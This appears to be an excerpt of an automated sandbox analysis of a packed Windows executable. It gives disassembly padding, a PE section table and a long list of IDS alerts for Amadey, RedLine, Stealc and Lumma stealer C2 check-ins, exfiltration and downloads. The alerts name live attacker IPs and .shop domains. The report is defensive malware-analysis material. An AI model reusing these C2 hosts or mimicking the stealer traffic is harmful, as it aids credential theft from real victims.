                                                                          add byte ptr [eax], al
                                                                          adc byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          or ecx, dword ptr [edx]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add al, 0Ah
                                                                          add byte ptr [eax], al
                                                                          or ecx, dword ptr [edx]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          push es
                                                                          add byte ptr [eax], 00000000h
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          adc byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          pop es
                                                                          or al, byte ptr [eax]
                                                                          add byte ptr [eax], al
                                                                          add byte ptr [eax], al
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x4e41f80x10ukgzfzxu
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x4e41a80x18ukgzfzxu
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          0x10000x680000x2de0029a1f66dc089db7cd259235a728b09eaFalse0.9972485950272479data7.981135166621274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x690000x1e00x200141a1852fb40e55a18a2071ab7a03568False0.58203125data4.486531367202845IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          0x6b0000x2c90000x200752d40bb54231b2e6f81a5fbaa4d13e4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          ukgzfzxu0x3340000x1b10000x1b0400972dcf534383a57b0fc0e4237b4bf3c1False0.99462749421631OpenPGP Secret Key7.954114494969637IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          svxbhzsv0x4e50000x10000x400d19207a9eefc4434e551d2bcc71ce517False0.7705078125data6.118991976515346IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .taggant0x4e60000x30000x22004763147a3e8a79ae4f88644fcca22727False0.06881893382352941DOS executable (COM)0.6425257842599887IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_MANIFEST0x4e42080x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                          DLLImport
                                                                          kernel32.dlllstrcpy
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-09-27T04:21:03.109743+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.549710185.215.113.1680TCP
                                                                          2024-09-27T04:21:04.166961+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549711185.215.113.11780TCP
                                                                          2024-09-27T04:21:05.370019+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.1680192.168.2.549710TCP
                                                                          2024-09-27T04:21:06.076576+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549712185.215.113.1680TCP
                                                                          2024-09-27T04:21:06.704853+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549713194.116.215.19580TCP
                                                                          2024-09-27T04:21:08.140028+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:08.140028+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:08.333467+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response195.179.250.4526212192.168.2.549714TCP
                                                                          2024-09-27T04:21:08.998809+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549715185.215.113.1680TCP
                                                                          2024-09-27T04:21:09.984061+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549716185.215.113.2680TCP
                                                                          2024-09-27T04:21:12.148645+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:12.148645+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:12.438294+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response165.21.18.5145580192.168.2.549719TCP
                                                                          2024-09-27T04:21:12.438395+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549720185.215.113.1680TCP
                                                                          2024-09-27T04:21:12.583748+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response165.21.18.5145580192.168.2.549719TCP
                                                                          2024-09-27T04:21:12.657577+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549720185.215.113.1680TCP
                                                                          2024-09-27T04:21:13.398377+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:13.595211+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)195.179.250.4526212192.168.2.549714TCP
                                                                          2024-09-27T04:21:13.800459+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.549721185.215.113.2680TCP
                                                                          2024-09-27T04:21:13.817728+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:14.176245+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:14.482192+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:14.491667+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549723185.215.113.1680TCP
                                                                          2024-09-27T04:21:14.682022+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:14.973067+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:14.987691+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549724176.113.115.9580TCP
                                                                          2024-09-27T04:21:15.170311+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:15.269386+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549725185.215.113.11780TCP
                                                                          2024-09-27T04:21:15.281835+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:15.369248+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:15.512109+02002044244ET MALWARE Win32/Stealc Requesting browsers Config from C21192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:15.518160+02002044245ET MALWARE Win32/Stealc Active C2 Responding with browsers Config1185.215.113.1780192.168.2.549722TCP
                                                                          2024-09-27T04:21:15.616618+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:15.743022+02002044246ET MALWARE Win32/Stealc Requesting plugins Config from C21192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:15.836522+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1185.215.113.1780192.168.2.549722TCP
                                                                          2024-09-27T04:21:15.856746+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:16.052602+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:16.332605+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:16.427085+02002044248ET MALWARE Win32/Stealc Submitting System Information to C21192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:16.661175+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:16.780172+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:16.977314+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:16.988562+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:17.186234+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:17.494773+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:17.508217+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:17.843765+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:17.848571+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)165.21.18.5145580192.168.2.549719TCP
                                                                          2024-09-27T04:21:18.060072+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:18.379078+02002856122ETPRO MALWARE Amadey CnC Response M11185.215.113.2680192.168.2.549721TCP
                                                                          2024-09-27T04:21:18.772116+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:19.178330+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:19.183486+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:20.219293+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:20.611307+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:20.813244+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:20.850558+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549728185.215.113.1680TCP
                                                                          2024-09-27T04:21:20.908544+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:21.017152+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:21.102882+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:21.116616+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549728185.215.113.1680TCP
                                                                          2024-09-27T04:21:21.296039+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:21.567423+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971495.179.250.4526212TCP
                                                                          2024-09-27T04:21:21.576698+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:21.782648+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:22.097536+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:22.313225+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:22.534709+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:22.736067+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:23.364228+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:23.491147+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549731185.215.113.1680TCP
                                                                          2024-09-27T04:21:23.568877+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:24.078791+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:24.196540+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:24.234487+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549733185.215.113.11780TCP
                                                                          2024-09-27T04:21:24.391440+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:25.629497+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:25.937055+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:26.137919+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:26.338483+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:26.443025+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:26.566308+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549738185.215.113.1680TCP
                                                                          2024-09-27T04:21:26.650781+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54971965.21.18.5145580TCP
                                                                          2024-09-27T04:21:27.063921+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:27.329679+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549740185.215.113.11780TCP
                                                                          2024-09-27T04:21:28.866765+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:29.352246+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:29.352246+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:29.465052+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549744185.215.113.1680TCP
                                                                          2024-09-27T04:21:29.526562+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response189.105.223.19629862192.168.2.549743TCP
                                                                          2024-09-27T04:21:29.597316+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.549722185.215.113.1780TCP
                                                                          2024-09-27T04:21:29.688021+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549744185.215.113.1680TCP
                                                                          2024-09-27T04:21:29.739621+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response189.105.223.19629862192.168.2.549743TCP
                                                                          2024-09-27T04:21:32.022330+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549749185.215.113.1680TCP
                                                                          2024-09-27T04:21:32.247108+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549749185.215.113.1680TCP
                                                                          2024-09-27T04:21:32.851910+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:32.851910+02002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:33.068659+02002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.215.113.6715206192.168.2.549750TCP
                                                                          2024-09-27T04:21:34.572744+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:34.673992+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549753185.215.113.1680TCP
                                                                          2024-09-27T04:21:34.905386+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549753185.215.113.1680TCP
                                                                          2024-09-27T04:21:35.394851+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:35.399703+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)189.105.223.19629862192.168.2.549743TCP
                                                                          2024-09-27T04:21:35.574292+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:35.722605+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.54975591.202.233.15880TCP
                                                                          2024-09-27T04:21:35.798129+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:35.976244+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:36.426655+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:36.732332+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:36.906933+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:36.986236+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549757185.215.113.1680TCP
                                                                          2024-09-27T04:21:37.079702+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:37.791130+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549759185.215.113.10380TCP
                                                                          2024-09-27T04:21:38.121784+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:38.430892+02002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.215.113.6715206192.168.2.549750TCP
                                                                          2024-09-27T04:21:38.733929+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:38.740303+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:39.303670+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:39.477939+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:39.568380+02002056156ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)1192.168.2.5609241.1.1.153UDP
                                                                          2024-09-27T04:21:39.595188+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:39.800528+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:39.805609+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:39.891955+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:40.067143+02002056157ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)1192.168.2.549761172.67.162.108443TCP
                                                                          2024-09-27T04:21:40.834724+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549761172.67.162.108443TCP
                                                                          2024-09-27T04:21:40.834724+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549761172.67.162.108443TCP
                                                                          2024-09-27T04:21:40.882674+02002056164ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)1192.168.2.5548041.1.1.153UDP
                                                                          2024-09-27T04:21:41.024523+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:41.327037+02002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.549763185.215.113.1680TCP
                                                                          2024-09-27T04:21:41.358465+02002056165ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)1192.168.2.549764104.21.4.136443TCP
                                                                          2024-09-27T04:21:41.799990+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549764104.21.4.136443TCP
                                                                          2024-09-27T04:21:41.799990+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549764104.21.4.136443TCP
                                                                          2024-09-27T04:21:41.811165+02002056162ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)1192.168.2.5630621.1.1.153UDP
                                                                          2024-09-27T04:21:41.985937+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:42.150872+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549766185.215.113.10380TCP
                                                                          2024-09-27T04:21:42.263346+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:42.286462+02002056163ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)1192.168.2.549768188.114.97.3443TCP
                                                                          2024-09-27T04:21:42.468552+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:42.605262+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:42.610943+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549767185.215.113.3780TCP
                                                                          2024-09-27T04:21:42.650790+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:42.768513+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549768188.114.97.3443TCP
                                                                          2024-09-27T04:21:42.768513+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549768188.114.97.3443TCP
                                                                          2024-09-27T04:21:42.826859+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:42.834216+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:42.843407+02002056160ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)1192.168.2.5528551.1.1.153UDP
                                                                          2024-09-27T04:21:43.041333+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:43.116994+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:43.214866+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:43.341734+02002056161ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)1192.168.2.549770188.114.96.3443TCP
                                                                          2024-09-27T04:21:43.442435+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:43.796860+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549770188.114.96.3443TCP
                                                                          2024-09-27T04:21:43.796860+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549770188.114.96.3443TCP
                                                                          2024-09-27T04:21:43.849666+02002056158ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)1192.168.2.5560061.1.1.153UDP
                                                                          2024-09-27T04:21:43.994728+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:44.092300+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549750185.215.113.6715206TCP
                                                                          2024-09-27T04:21:44.167289+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
                                                                          2024-09-27T04:21:44.339968+02002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.54974389.105.223.19629862TCP
